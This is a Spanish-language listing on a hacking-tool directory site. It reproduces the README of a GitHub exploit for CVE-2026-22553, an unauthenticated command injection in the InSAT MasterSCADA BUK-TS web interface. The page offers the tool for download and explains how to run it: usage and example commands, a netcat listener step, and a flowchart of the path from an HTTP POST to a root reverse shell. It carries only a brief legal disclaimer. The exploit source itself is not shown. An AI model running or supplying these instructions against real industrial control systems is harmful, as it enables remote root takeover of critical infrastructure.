Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Generación de PayloadsExplotaciónSeguridad SCADA/ICSExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Exploit de inyección de comandos del sistema operativo no autenticado para la interfaz web BUK-TS MMadmServ de InSAT MasterSCADA. Entrega una shell inversa con privilegios de root mediante una solicitud HTTP POST. CVSS 9.8 crítico.

Ver Repositorio
4hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE sin autenticación

CVE-2026-22553 | CVSS 9.8 Crítico | Autor del exploit: Mohammed Idrees Banyamer


📝 Descripción

InSAT MasterSCADA BUK-TS sufre una vulnerabilidad de inyección de comandos del sistema operativo sin autenticación en la interfaz web MMadmServ. Esta falla permite a atacantes remotos lograr ejecución remota completa de código (RCE) sin necesidad de autenticación.

  • Producto afectado: InSAT MasterSCADA BUK-TS (Todas las versiones)
  • Tipo de vulnerabilidad: Inyección de comandos del sistema operativo (CWE-78)
  • Gravedad: Crítico (CVSS v3.1 Puntaje: 9.8)
  • Autor del exploit:
Mohammed Idrees Banyamer
  • País: Jordania 🇯🇴

  • 🛠️ Diagrama del método de ataque

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
        B -->|Unauthenticated| C[Vulnerable Parameter]
        C -->|OS Command Injection| D[Command Execution on Target Server]
        D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
        
        style A fill:#ff4d4d,stroke:#fff
        style E fill:#4dff88,stroke:#fff

    🚀 Uso

    root@kitploit:~
    python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
    

    Ejemplo

    root@kitploit:~
    python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
    

    Opciones

    OpciónDescripción
    targetURL del objetivo (p. ej. http://ip:puerto)
    --lhostSu dirección IP (shell inversa)
    --lportSu puerto de escucha

    📌 Cómo usar

    1. Inicie un listener en su máquina:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Ejecute el exploit:

      root@kitploit:~
      python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
      
    3. Obtenga una shell inversa con privilegios de root/sistema.


    ⚠️ Aviso legal

    Este exploit se proporciona solo con fines educativos y de pruebas de penetración autorizadas.
    El uso no autorizado contra sistemas que no le pertenecen es ilegal y puede violar leyes internacionales.
    El autor no es responsable de ningún uso indebido.


    📬 Autor

    Mohammed Idrees Banyamer

    • Instagram: @banyamer_security
    • GitHub: mbanyamer
    • País: Jordania 🇯🇴

    ¡Dale una estrella ⭐ a este repositorio si te resultó útil!

    Descargar herramienta